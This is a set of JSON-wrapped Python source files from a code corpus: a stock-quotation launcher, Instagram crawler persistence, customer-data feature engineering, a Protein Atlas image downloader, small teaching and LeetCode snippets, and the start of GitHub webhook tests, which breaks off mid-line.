+{"seq_id":"296120811","text":"import easyquotation\nimport datetime\nimport json\nimport easyquant\nfrom easyquant import DefaultQuotationEngine, DefaultLogHandler, PushBaseEngine\nfrom custom.fixedmainengine import FixedMainEngine\nfrom custom.sinadataengine import SinaEngine\n#import pymongo\n#import redis\n# choose = input('1: \\n:')\nimport click\n\nbroker = None\n\nneed_data = '' #get_broker_need_data(broker)\n\nclass DataSinaEngine(SinaEngine):\n EventType = 'data-sina'\n PushInterval = 5\n config = \"stock_calc_list\"\n\n@click.command ()\n@click.option ('--log-name', default=\"SAME_NAME\", help = 'log-name')\n@click.option('--calc-name', default = \"calc-day-data\", help= 'calc-name[calc-day-data, calc-min-data,calc-day-index]')\ndef startWork(calc_name, log_name):\n # log_type_choose = '2' #input('请输入 log 记录方式: 1: 显示在屏幕 2: 记录到指定文件\\n: ')\n log_type = 'file'#'stdout' if log_type_choose == '1' else 'file'\n\n if log_name == 'SAME_NAME':\n log_filepath = 'logs/%s.txt' % calc_name\n else:\n log_filepath = 'logs/%s.txt' % log_name\n\n log_handler = DefaultLogHandler(name='calc-data', log_type=log_type, filepath=log_filepath)\n qe_list=[DataSinaEngine]\n m = easyquant.MainEngine(broker, need_data, quotation_engines=qe_list, log_handler=log_handler)\n # m = FixedMainEngine(broker, need_data, quotation_engines=qe_list, log_handler=log_handler)\n m.is_watch_strategy = False #True # 策略文件出现改动时,自动重载,不建议在生产环境下使用\n names=[calc_name]\n m.load_strategy(names=names)\n m.start()\n\nif __name__ == \"__main__\":\n startWork()\n","sub_path":"mycalc.py","file_name":"mycalc.py","file_ext":"py","file_size_in_byte":1607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"492891268","text":"from datetime import datetime\nfrom typing import List\n\nfrom peewee import fn\n\nfrom inscrawler.model.profile import Profile\nfrom inscrawler.persistence.data.following_data import create_or_update_following\nfrom inscrawler.persistence.entity.profile_entity import ProfileEntity\n\n\ndef create_or_update_profile(profile: Profile):\n profile_entity_on_db: ProfileEntity = ProfileEntity.get_or_create(username=profile.username)[0]\n\n now = int(datetime.now().timestamp())\n if profile_entity_on_db.created_at is None:\n profile.created_at = now\n else:\n profile.created_at = profile_entity_on_db.created_at\n\n profile.last_visit = now\n\n profile.id_ = profile_entity_on_db.id\n profile_entity: ProfileEntity = to_entity(profile)\n\n profile_entity.save()\n\n for follower in profile.followers:\n create_or_update_following(follower, profile)\n\n for follower in profile.followings:\n create_or_update_following(profile, follower)\n\n\ndef get_or_create_profile(username: str) -> Profile:\n profile_entity: ProfileEntity = ProfileEntity.get_or_create(username=username)[0]\n return from_entity(profile_entity)\n\n\n# Let A be a sorted list of profiles(by the last_visit column), sort a random number between 1 and the number of\n# elements of the profile table, and then select the n_profile elements below the nth + 1 record\ndef get_profile_to_crawl(n_profile: int) -> List[Profile]:\n profile_entity_list: List[ProfileEntity] = ProfileEntity.select().order_by(ProfileEntity.last_visit.asc()).limit(\n n_profile).offset(fn.FLOOR(fn.RANDOM() * ProfileEntity.select().count()) + 1)\n\n return [from_entity(profile) for profile in profile_entity_list]\n\n\ndef to_entity(profile: Profile) -> ProfileEntity:\n return ProfileEntity(id=profile.id_,\n username=profile.username,\n name=profile.name,\n description=profile.description,\n n_followers=profile.n_followers,\n n_following=profile.n_following,\n n_posts=profile.n_posts,\n photo_url=profile.photo_url,\n last_visit=profile.last_visit,\n created_at=profile.created_at,\n deleted=profile.deleted,\n visited=profile.visited)\n\n\ndef from_entity(profile_entity: ProfileEntity) -> Profile:\n return Profile(id_=profile_entity.id,\n username=profile_entity.username,\n name=profile_entity.name,\n description=profile_entity.description,\n n_followers=profile_entity.n_followers,\n n_following=profile_entity.n_following,\n n_posts=profile_entity.n_posts,\n photo_url=profile_entity.photo_url,\n last_visit=profile_entity.last_visit,\n created_at=profile_entity.created_at,\n deleted=profile_entity.deleted,\n visited=profile_entity.visited)\n","sub_path":"inscrawler/persistence/data/profile_data.py","file_name":"profile_data.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"161834676","text":"import sys\nimport numpy as np\nimport pandas as pd\nfrom scipy import stats\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import KBinsDiscretizer\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.decomposition import PCA\n\n\nclass FeatureEngineer:\n def __init__(self, training, unseen):\n self._rank = {}\n self.training = training\n self.unseen = unseen\n\n self._extract_business_features()\n self._merge_categories()\n self._generate_dummies()\n\n\n\n def _extract_business_features(self):\n \"\"\"\"\n Here we extract the new business oriented featured from the original features\n \"\"\"\n\n # Put all of the creation of new variables into a function so we can call it both for self.training and\n # for self.unseen instead of writing all this twice.\n def create_bus_feat(df):\n n = df.shape[0]\n\n # Percentage of Monetary Units spent on gold products out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = df[\"MntGoldProds\"].iloc[i] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :]) * 100\n\n df[\"PrpGoldProds\"] = aux\n\n # Number of Accepted Campaigns out of the last 5 Campaigns\n aux = [0] * n\n\n for i in range(n):\n aux[i] = sum(\n df[['AcceptedCmp3', 'AcceptedCmp4', 'AcceptedCmp5', 'AcceptedCmp1', 'AcceptedCmp2']].iloc[i, :])\n\n df[\"NmbAccCmps\"] = aux\n\n # Proportion of Accepted Campaigns out of the last 5 Campaigns\n aux = [0] * n\n\n for i in range(n):\n aux[i] = (sum(\n df[['AcceptedCmp3', 'AcceptedCmp4', 'AcceptedCmp5', 'AcceptedCmp1', 'AcceptedCmp2']].iloc[i,\n :]) / 5) * 100\n\n df[\"PrpAccCmps\"] = aux\n\n # Proportion of Monetary Units spent on Wine out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntWines\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpWines\"] = aux\n\n # Proportion of Monetary Units spent on Fruits out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntFruits\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpFruits\"] = aux\n\n # Proportion of Monetary Units spent on Meat out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntMeatProducts\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpMeat\"] = aux\n\n # Proportion of Monetary Units spent on Fish out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntFishProducts\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpFish\"] = aux\n\n # Proportion of Monetary Units spent on Sweets out of the total spent\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(df[[\"MntSweetProducts\"]].iloc[i, :] / sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :])) * 100\n\n df[\"PrpSweets\"] = aux\n\n # Monetary\n aux = [0] * n\n\n for i in range(n):\n aux[i] = sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i, :])\n\n df[\"Mnt\"] = aux\n\n # Buy Potential\n aux = [0] * n\n\n for i in range(n):\n aux[i] = float(sum(\n df[['MntWines', 'MntFruits', 'MntMeatProducts', 'MntFishProducts', 'MntSweetProducts']].iloc[i,\n :]) / ((df[[\"Income\"]].iloc[i, :]) * 2))\n\n df[\"BuyPot\"] = aux\n\n # Frequency\n aux = [0] * n\n\n for i in range(n):\n aux[i] = sum(\n df[['NumDealsPurchases', 'NumWebPurchases', 'NumCatalogPurchases', 'NumStorePurchases']].iloc[i, :])\n\n df[\"Freq\"] = aux\n\n # Creating RFM feature using Recency, Freq and Mnt:\n feature_list, n_bins = [\"Recency\", \"Freq\", \"Mnt\"], 5\n rfb_dict = {}\n for feature in feature_list:\n bindisc = KBinsDiscretizer(n_bins=n_bins, encode='ordinal', strategy=\"quantile\")\n feature_bin = bindisc.fit_transform(df[feature].values[:, np.newaxis])\n feature_bin = pd.Series(feature_bin[:, 0], index=df.index)\n feature_bin += 1\n\n if feature == \"Recency\":\n feature_bin = feature_bin.sub(5).abs() + 1\n rfb_dict[feature + \"_bin\"] = feature_bin.astype(int).astype(str)\n\n df[\"RFM\"] = (rfb_dict['Recency_bin'] + rfb_dict['Freq_bin'] + rfb_dict['Mnt_bin']).astype(int)\n\n # Creating new feature using PCA to summarize all features in 2 dimensions (2 new features)\n columns = df.columns\n columns = columns.drop([\"Response\", \"Marital_Status\", \"Education\"])\n\n pca = PCA(n_components=2)\n principalComponents = pca.fit_transform(df[columns])\n\n df[\"pc1_\"] = principalComponents[:, 0]\n df[\"pc2_\"] = principalComponents[:, 1]\n\n # Creating new feature using PCA to summarize all features in 5 dimensions (5 new features)\n pca = PCA(n_components=5)\n principalComponents = pca.fit_transform(df[columns])\n\n df[\"pc1\"] = principalComponents[:, 0]\n df[\"pc2\"] = principalComponents[:, 1]\n df[\"pc3\"] = principalComponents[:, 2]\n df[\"pc4\"] = principalComponents[:, 3]\n df[\"pc5\"] = principalComponents[:, 4]\n\n\n\n\n create_bus_feat(self.training)\n create_bus_feat(self.unseen)\n\n\n\n def _merge_categories(self):\n \"\"\"\"\n We merge the categories Marital_Status and Education respecting the enconding previously done in data_loader\n It it as follows:\n Marital_Status: \"Single\" as 3, \"Widow\" as 2, \"Divorced\" as 1 and [\"Married\", \"Together\"] as 0\n Education: \"Phd\" as 2, \"Master\" as 1 and ['Graduation', 'Basic', '2n Cycle'] as 0\n\n The feature HasOffspring that works as a kind of merging of KidHome and TeenHome indicating presence\n of offsrping\n \"\"\"\n self.dict_merge_cat = {\"Marital_Status\": lambda x: 3 if x == 0 else (2 if x == 1 else (1 if x == 2 else 0)),\n \"Education\": lambda x: 2 if x == 4 else (1 if x == 3 else 0),\n \"NmbAccCmps\": lambda x: 1 if x > 0 else 0,\n \"Age_d\": lambda x: 3 if x == 0 else (2 if x == 1 else (1 if x == 2 else (4 if x == 4 else 0))),\n \"Income_d\": lambda x: 3 if x == 5 else (2 if x == 4 else (1 if x == 3 else 0))}\n\n # Applies the dictionary on both datasets\n for key, value in self.dict_merge_cat.items():\n self.training[\"MC_\"+key] = self.training[key].apply(value).astype('category')\n self.unseen[\"MC_\" + key] = self.unseen[key].apply(value).astype('category')\n\n\n # Function to apply both on traininf and unseen that creates the HasOffspring feature that\n # indicates presence of any children or teen\n def create_hasoffsrping(df):\n # HasOffsrping Feature\n aux = [0] * df.shape[0]\n\n for i in range(df.shape[0]):\n if (int(df[[\"Kidhome\"]].iloc[i, :]) + int(df[[\"Teenhome\"]].iloc[i, :]) > 0):\n aux[i] = 1\n else:\n aux[i] = 0\n\n df[\"HasOffspring\"] = aux\n df[\"HasOffspring\"] = df[\"HasOffspring\"].astype('category')\n\n # Applies the function create_hasoffspring on both datasets\n create_hasoffsrping(self.training)\n create_hasoffsrping(self.unseen)\n\n\n\n def _generate_dummies(self):\n \"\"\"\"\n Use OneHotEncoding to generate dummies for the merged Marital_Status and Education features\n \"\"\"\n features_to_enconde = ['MC_Marital_Status', 'MC_Education', 'MC_NmbAccCmps', 'MC_Age_d', 'MC_Income_d']\n columns = [\"DT_MS_Single\", \"DT_MS_Widow\", \"DT_MS_Divorced\", \"DT_E_Phd\", \"DT_E_Master\", \"DT_Acc_1\",\n \"DT_Age_4\", \"DT_Age_3\", \"DT_Age_2\", \"DT_Age_1\", \"DT_Income_3\", \"DT_Income_2\", \"DT_Income_1\"]\n idxs = [1, 2, 3, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] # 1(Single), 2(Widow), 3(Divorced), 4(MS_Zero), 5(Phd),\n # 6(Master), 7(Accepted at least 1 campaign) , 8(Educ_Zero)\n # encode categorical features from training data as a one-hot numeric array.\n enc = OneHotEncoder(handle_unknown='ignore')\n Xtr_enc = enc.fit_transform(self.training[features_to_enconde]).toarray()\n # update training data\n df_temp = pd.DataFrame(Xtr_enc[:, idxs], index=self.training.index, columns=columns)\n self.training = pd.concat([self.training, df_temp], axis=1)\n for c in columns:\n self.training[c] = self.training[c].astype('category')\n # use the same encoder to transform unseen data\n Xun_enc = enc.transform(self.unseen[features_to_enconde]).toarray()\n # update unseen data\n df_temp = pd.DataFrame(Xun_enc[:, idxs], index=self.unseen.index, columns=columns)\n self.unseen = pd.concat([self.unseen, df_temp], axis=1)\n for c in columns:\n self.unseen[c] = self.unseen[c].astype('category')\n\n\n\n def box_cox_transformations(self, num_features, target):\n \"\"\"\"\n Applies the box-cox transformations to the numerical features and checks which transformations are better\n for each feature and appends them to the training and unseen datasets\n \"\"\"\n\n # 1) perform feature scaling, using MinMaxScaler from sklearn\n bx_cx_scaler = MinMaxScaler(feature_range=(0, 1), copy=False)\n X_tr_01 = bx_cx_scaler.fit_transform(self.training[num_features].values)\n X_un_01 = bx_cx_scaler.transform(self.unseen[num_features].values)\n num_features_BxCx = [\"BxCxT_\" + s for s in num_features]\n self.training = pd.concat([self.training.loc[:, self.training.columns != target],\n pd.DataFrame(X_tr_01, index=self.training.index, columns=num_features_BxCx),\n self.training[target]], axis=1)\n self.unseen = pd.concat([self.unseen.loc[:, self.unseen.columns != target],\n pd.DataFrame(X_un_01, index=self.unseen.index, columns=num_features_BxCx),\n self.unseen[target]], axis=1)\n # 2) define a set of transformations\n self._bx_cx_trans_dict = {\"x\": lambda x: x, \"log\": np.log, \"sqrt\": np.sqrt,\n \"exp\": np.exp, \"**1/4\": lambda x: np.power(x, 0.25),\n \"**2\": lambda x: np.power(x, 2), \"**4\": lambda x: np.power(x, 4)}\n # 3) perform power transformations on scaled features and select the best\n self.best_bx_cx_dict = {}\n for feature in num_features_BxCx:\n best_test_value, best_trans_label, best_power_trans = 0, \"\", None\n for trans_key, trans_value in self._bx_cx_trans_dict.items():\n # 3) 1) 1) apply transformation on training data\n feature_trans = np.round(trans_value(self.training[feature]), 4)\n if trans_key == \"log\":\n feature_trans.loc[np.isfinite(feature_trans) == False] = -50\n # 3) 1) 2) bin transformed feature (required to perform Chi-Squared test)\n bindisc = KBinsDiscretizer(n_bins=10, encode=\"ordinal\", strategy=\"uniform\")\n feature_bin = bindisc.fit_transform(feature_trans.values.reshape(-1, 1))\n feature_bin = pd.Series(feature_bin[:, 0], index=self.training.index)\n # 3) 1) 3) obtain contingency table\n cont_tab = pd.crosstab(feature_bin, self.training[target], margins=False)\n # 3) 1) 4) compute Chi-Squared test\n chi_test_value = stats.chi2_contingency(cont_tab)[0]\n # 3) 1) 5) choose the best so far Box-Cox transformation based on Chi-Squared test\n if chi_test_value > best_test_value:\n best_test_value, best_trans_label, best_power_trans = chi_test_value, trans_key, feature_trans\n self.best_bx_cx_dict[feature] = (best_trans_label, best_power_trans)\n # 3) 2) append transformed feature to the data frame\n self.training[feature] = best_power_trans\n # 3) 3) apply the best Box-Cox transformation, determined on training data, on unseen data\n self.unseen[feature] = np.round(self._bx_cx_trans_dict[best_trans_label](self.unseen[feature]), 4)\n self.box_cox_features = num_features_BxCx\n\n\n\n def rank_features_chi_square(self, continuous_flist, categorical_flist):\n \"\"\"\"\n Method to rank all features according to chi-square test for independence in relation to Response.\n All based solely on the training set.\n \"\"\"\n chisq_dict = {}\n if continuous_flist:\n bindisc = KBinsDiscretizer(n_bins=10, encode='ordinal', strategy=\"uniform\")\n for feature in continuous_flist:\n feature_bin = bindisc.fit_transform(self.training[feature].values[:, np.newaxis])\n feature_bin = pd.Series(feature_bin[:, 0], index=self.training.index)\n cont_tab = pd.crosstab(feature_bin, self.training[\"Response\"], margins=False)\n chisq_dict[feature] = stats.chi2_contingency(cont_tab.values)[0:2]\n if categorical_flist:\n for feature in categorical_flist:\n cont_tab = pd.crosstab(self.training[feature], self.training[\"Response\"], margins=False)\n chisq_dict[feature] = stats.chi2_contingency(cont_tab.values)[0:2]\n\n df_chisq_rank = pd.DataFrame(chisq_dict, index=[\"Chi-Squared\", \"p-value\"]).transpose()\n df_chisq_rank.sort_values(\"Chi-Squared\", ascending=False, inplace=True)\n df_chisq_rank[\"valid\"] = df_chisq_rank[\"p-value\"] <= 0.05\n self._rank[\"chisq\"] = df_chisq_rank\n\n def calc_dta_feat_worth(self, feat_list, max_depth, min_samples_split, min_samples_leaf, seed):\n \"\"\"\"\n Method that receives a list of feature names, name of target and DecisionTreeClassifier paramethers and\n returns a df with all features with a worth higher than zero. All based solely on the training set.\n \"\"\"\n\n # Preparing the Input Data for the DTA\n X = self.training.loc[:, feat_list].values\n y = self.training[\"Response\"].values\n\n # Run the estimation through DecisionTreeClassifier\n dtree = DecisionTreeClassifier(criterion=\"entropy\", max_depth=max_depth, min_samples_split=min_samples_split,\n min_samples_leaf = min_samples_leaf, random_state=seed)\n # Fits the DTClassifier with our data\n dtree = dtree.fit(X, y)\n\n # Create a dictionary with the name of all features and its importance according to the DTA estimation\n fi = dict(zip(feat_list, dtree.feature_importances_))\n # Then creates a Dataframe with it\n fidf = pd.DataFrame(fi, index=[\"worth\"])\n # Transpose it because the way it is created it is on the other orientation\n fidf_t = fidf.transpose().sort_values(by=\"worth\", ascending=False)\n # Removes features with worth 0 and puts it into a df called worth_df\n worth_df = fidf_t[fidf_t.worth > 0]\n\n self._rank[\"dta\"] = worth_df\n\n def print_top(self, n=10):\n \"\"\"\"\n Prints the best n features (default n = 10)\n \"\"\"\n print(self._rank.index[0:n])\n\n def get_top(self, criteria, n_top):\n \"\"\"\"\n Returns the training and unseen datasets with only the best n_top features according to the criteria\n selected (chi_square or dta) (default n_top = 10).\n \"\"\"\n input_features = list(self._rank[criteria].index[0:n_top])\n input_features.append(\"Response\")\n return self.training[input_features], self.unseen[input_features]\n\n\n\n def _input_missing_values(self):\n \"\"\"\"\n Inputs any missing values of numerical features with its mean in order to deal with the weird missings.\n\n NOTE: we are doing this here due to missing values in the newly engineered features that could\n appear due to weird interaction between features, like dividing by zero or something of that nature.\n \"\"\"\n\n def input_missing(df):\n num_feat_list = df._get_numeric_data().drop([\"Response\", \"Education\", \"Marital_Status\"], axis=1).columns\n for feat in num_feat_list:\n if (df[feat].isna().sum() > 0):\n df[feat] = df[feat].fillna(df[feat].mean())\n\n return\n\n # We need to apply on training AND on unseen data, since the Box-Cox transformations were applied on both datsets.\n input_missing(self.training)\n input_missing(self.unseen)\n\n return","sub_path":"ml_bc_pipeline/feature_engineering.py","file_name":"feature_engineering.py","file_ext":"py","file_size_in_byte":18008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"267307945","text":"import glob\nimport os\nimport xml.etree.ElementTree as ET\nfrom multiprocessing.pool import Pool\n\nimport cv2\nimport numpy as np\nimport pandas as pd\nimport requests\n\nPROTEINS = [\n 'nucleoplasm',\n 'nuclear membrane',\n 'nucleoli',\n 'nucleoli fibrillar center',\n 'nuclear speckles',\n 'nuclear bodies',\n 'endoplasmic reticulum',\n 'golgi apparatus',\n 'peroxisomes',\n 'endosomes',\n 'lysosomes',\n 'intermediate filaments',\n 'actin filaments',\n 'focal adhesion sites',\n 'microtubules',\n 'microtubule ends',\n 'cytokinetic bridge',\n 'mitotic spindle',\n 'microtubule organizing center',\n 'centrosome',\n 'lipid droplets',\n 'plasma membrane',\n 'cell junctions',\n 'mitochondria',\n 'aggresome',\n 'cytosol',\n 'cytoplasmic bodies',\n 'rods & rings',\n # ---\n 'midbody',\n 'cleavage furrow',\n 'nucleus',\n 'vesicles',\n 'midbody ring'\n]\n\nIMAGE_URL_PREFIX = 'http://v18.proteinatlas.org/images/'\nIMAGE_URL_SUFFIX = '_blue_red_green.jpg'\n\nBASE_HPA_DIR = '/storage/kaggle/hpa'\nBASE_HPA_EXT_DIR = '/storage/kaggle/hpa_external'\n\n\ndef download_xml(gene_id):\n dst_file_path = '{}/xmls/{}.xml'.format(BASE_HPA_EXT_DIR, gene_id)\n if not os.path.isfile(dst_file_path):\n url = 'https://v18.proteinatlas.org/{}.xml'.format(gene_id)\n r = requests.get(url, allow_redirects=True)\n open(dst_file_path, 'wb').write(r.content)\n\n\ndef download_image(image_id):\n v18_url = 'http://v18.proteinatlas.org/images/'\n img = image_id.split('_')\n for color in ['red', 'green', 'blue', 'yellow']:\n img_path = img[0] + '/' + \"_\".join(img[1:]) + \"_\" + color + \".jpg\"\n img_name = image_id + \"_\" + color + \".jpg\"\n dst_file_path = '{}/images/{}'.format(BASE_HPA_EXT_DIR, img_name)\n if not os.path.isfile(dst_file_path):\n img_url = v18_url + img_path\n r = requests.get(img_url, allow_redirects=True)\n open(dst_file_path, 'wb').write(r.content)\n\n\ndef convert_to_png(src_file):\n basename = os.path.basename(src_file)\n dst_file = '{}/pngs/{}.png'.format(BASE_HPA_EXT_DIR, basename[:-4])\n if not os.path.isfile(dst_file):\n channel_name = src_file.split('_')[-1][:-4]\n image = load_image_channel(src_file, 512, channel_name)\n cv2.imwrite(dst_file, image)\n\n\ndef load_image_channel(file_path, image_size, channel_name):\n channel = cv2.imread(file_path)\n if channel is None:\n error_message = 'could not load image: \"{}\"'.format(file_path)\n print(error_message, flush=True)\n raise Exception(error_message)\n if channel.shape[0] != image_size:\n channel = cv2.resize(channel, (image_size, image_size), interpolation=cv2.INTER_AREA)\n\n if channel_name == 'red':\n channel = channel[:, :, 2]\n elif channel_name == 'green':\n channel = channel[:, :, 1]\n elif channel_name == 'blue':\n channel = channel[:, :, 0]\n elif channel_name == 'yellow':\n channel = (0.5 * channel[:, :, 2] + 0.5 * channel[:, :, 1]).astype(np.uint8)\n else:\n raise Exception('unexpected channel name \"{}\"'.format(channel_name))\n\n return channel\n\n\ndef parse_xml(gene_id):\n result = []\n\n tree = ET.parse('{}/xmls/{}.xml'.format(BASE_HPA_EXT_DIR, gene_id))\n sub_assay_elements = tree.findall(\".//cellExpression/subAssay[@type='human']\")\n for sub_assay_element in sub_assay_elements:\n verification = sub_assay_element.findall('./verification')[0].text.lower()\n if verification == 'approved':\n data_elements = sub_assay_element.findall(\"./data\")\n for data_element in data_elements:\n location_elements = data_element.findall('./location')\n # locations = [(l.attrib['GOId'], l.text) for l in location_elements]\n locations = []\n for location_element in location_elements:\n location = PROTEINS.index(location_element.text)\n if location < 28:\n locations.append(location)\n if len(locations) > 0:\n image_url_elements = data_element.findall(\"./assayImage/image/imageUrl\")\n for image_url_element in image_url_elements:\n image_url = image_url_element.text\n if not image_url.startswith(IMAGE_URL_PREFIX) or not image_url.endswith(IMAGE_URL_SUFFIX):\n raise Exception('unexpected image URL \"{}\"'.format(image_url))\n image_id = image_url[len(IMAGE_URL_PREFIX):-len(IMAGE_URL_SUFFIX)].replace('/', '_')\n result.append((image_id, locations))\n\n return result\n\n\ndef analyze():\n colors = ['red', 'green', 'blue', 'yellow']\n id_colors = {}\n for f in glob.glob('{}/pngs/*.png'.format(BASE_HPA_EXT_DIR)):\n b = os.path.basename(f)\n for c in colors:\n s = '_{}.png'.format(c)\n if b.endswith(s):\n id = b[:-len(s)]\n ic = id_colors.setdefault(id, [])\n ic.append(c)\n id_colors[id] = ic\n\n print('found {} samples'.format(len(id_colors)), flush=True)\n\n for k, v in id_colors.items():\n if len(v) != len(colors):\n print('sample \"{}\" only has colors {}'.format(k, v), flush=True)\n\n\nif __name__ == \"__main__\":\n os.makedirs('{}/images'.format(BASE_HPA_EXT_DIR), exist_ok=True)\n os.makedirs('{}/pngs'.format(BASE_HPA_EXT_DIR), exist_ok=True)\n os.makedirs('{}/xmls'.format(BASE_HPA_EXT_DIR), exist_ok=True)\n\n df = pd.read_csv('./analysis/subcellular_location.tsv', sep='\\t', index_col='Gene')\n\n print('downloading xmls...', flush=True)\n with Pool(64) as pool:\n pool.map(download_xml, df.index.tolist())\n\n print('parsing xmls...', flush=True)\n sample_ids = []\n sample_targets = []\n with Pool(64) as pool:\n for samples in pool.map(parse_xml, df.index.tolist()):\n for sample in samples:\n sample_ids.append(sample[0])\n sample_targets.append(sample[1])\n print(len(sample_ids))\n\n print('downloading images...', flush=True)\n with Pool(64) as pool:\n pool.map(download_image, sample_ids)\n\n print('converting images to pngs...', flush=True)\n with Pool(64) as pool:\n pool.map(convert_to_png, glob.glob('{}/images/*.jpg'.format(BASE_HPA_EXT_DIR)))\n\n analyze()\n\n print('exporting results...', flush=True)\n train_df = pd.read_csv('{}/train.csv'.format(BASE_HPA_DIR), index_col='Id')\n external_df = pd.DataFrame(index=sample_ids, data={'Target': [' '.join(list(map(str, t))) for t in sample_targets]})\n combined_df = pd.concat([train_df, external_df])\n combined_df.to_csv('{}/train_extended.csv'.format(BASE_HPA_DIR), index_label='Id')\n","sub_path":"download_hpa_data.py","file_name":"download_hpa_data.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"162979474","text":"\"\"\"\n# @Time : 2020/7/18\n# @Author : Jimou Chen\n\"\"\"\n\n\nclass A(str):\n def __new__(cls, string):\n string = string.upper()\n return str.__new__(cls, string)\n\n\na = A('hello World')\nprint(a)\n\n\nclass B:\n def __init__(self):\n print('构造函���被调用')\n\n def __del__(self):\n print('析构函数被调用')\n\n\nb1 = B()\nb2 = b1\nb3 = b2\ndel b3\ndel b2\ndel b1\n\n\n# 重写加减法,继承int类\nclass Int(int):\n def __add__(self, other):\n return int.__sub__(self, other)\n\n def __sub__(self, other):\n return int(self) + int(other)\n # 或者return int.__add__(self, other)\n\n\na = Int(5)\nb = Int(4)\nprint(a + b, a - b)\n","sub_path":"PythonLearning/ClassTest/magic_method.py","file_name":"magic_method.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"371873453","text":"#\n# @lc app=leetcode.cn id=8 lang=python\n#\n# [8] 字符串转换整数 (atoi)\n#\n\n# @lc code=start\nclass Solution(object):\n def myAtoi(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not s:\n return 0\n max_int = 2 ** 31 - 1\n min_val = -2 ** 31\n\n index, sign, result = 0, 1, 0\n lens = len(s)\n while index < lens and s[index] == ' ' :\n index += 1\n \n if index < lens and (s[index] == '+' or s[index] == '-'):\n sign = 1 if s[index] == '+' else -1\n index += 1\n \n while index < lens:\n digit = ord(s[index]) - ord('0')\n if digit < 0 or digit > 9:\n break\n\n if max_int // 10 < result or (max_int // 10 == result and max_int % 10 < digit):\n return max_int if sign == 1 else min_val\n\n result = result * 10 + digit\n index += 1\n\n return sign * result\n# @lc code=end\n\n","sub_path":"Week_09/8.字符串转换整数-atoi.py","file_name":"8.字符串转换整数-atoi.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"272885452","text":"import asyncio\nimport copy\nfrom http import client\nimport json\nimport pathlib\nimport unittest\nfrom urllib import parse\n\nfrom aiohttp import hdrs, web\n\nfrom .. import abc as ni_abc\nfrom .. import github\nfrom . import util\n\n\nclass OfflineHost(github.Host):\n\n \"\"\"A subclass of github.Host which does not touch the network.\"\"\"\n\n def __init__(self, *args, network, **kwargs):\n super().__init__(*args, **kwargs)\n self._network = network\n\n async def get(self, client, url):\n return self._network[('GET', url)]\n\n async def post(self, client, url, payload):\n expected = self._network[('POST', url)]\n assert expected == payload, '{!r} != {!r}'.format(payload, expected)\n\n async def delete(self, client, url):\n assert self._network[('DELETE', url)]\n\n\ndef example(file_name):\n this_dir = pathlib.Path(__file__).parent\n examples = this_dir / 'examples' / 'github'\n example = examples / file_name\n with example.open('r', encoding='utf-8') as file:\n return json.load(file)\n\n\nclass GitHubTests(util.TestCase):\n\n acceptable = {github.PullRequestEvent.opened,\n github.PullRequestEvent.unlabeled,\n github.PullRequestEvent.synchronize}\n\n @classmethod\n def setUpClass(cls):\n github.EASTEREGG_PROBABILITY = 0.0\n cls.opened_example = example('opened.json')\n cls.unlabeled_example = example('unlabeled.json')\n cls.synchronize_example = example('synchronize.json')\n cls.commits_example = example('commits.json')\n cls.commits_url = 'https://api.github.com/repos/Microsoft/Pyjion/pulls/109/commits'\n cls.issues_example = example('issues.json')\n cls.issues_url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109'\n cls.labels_example = example('labels.json')\n cls.labels_url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109/labels'\n cls.comments_url = 'https://api.github.com/repos/Microsoft/Pyjion/issues/109/comments'\n\n def test_bad_content_type(self):\n # Only accept 'application/json'.\n # https://developer.github.com/webhooks/creating/#content-type\n request = util.FakeRequest(content_type='application/x-www-form-urlencoded')\n with self.assertRaises(ni_abc.ResponseExit) as cm:\n self.run_awaitable(github.Host.process(util.FakeServerHost(), request))\n self.assertEqual(cm.exception.response.status, 415)\n\n def test_ping(self):\n # GitHub can ping a webhook to verify things are set up.\n # https://developer.github.com/webhooks/#ping-event\n payload = {'zen': 'something pithy'}\n with self.assertRaises(ni_abc.ResponseExit) as cm:\n self.run_awaitable(github.Host.process(util.FakeServerHost(),\n util.FakeRequest(payload)))\n self.assertEqual(cm.exception.response.status, 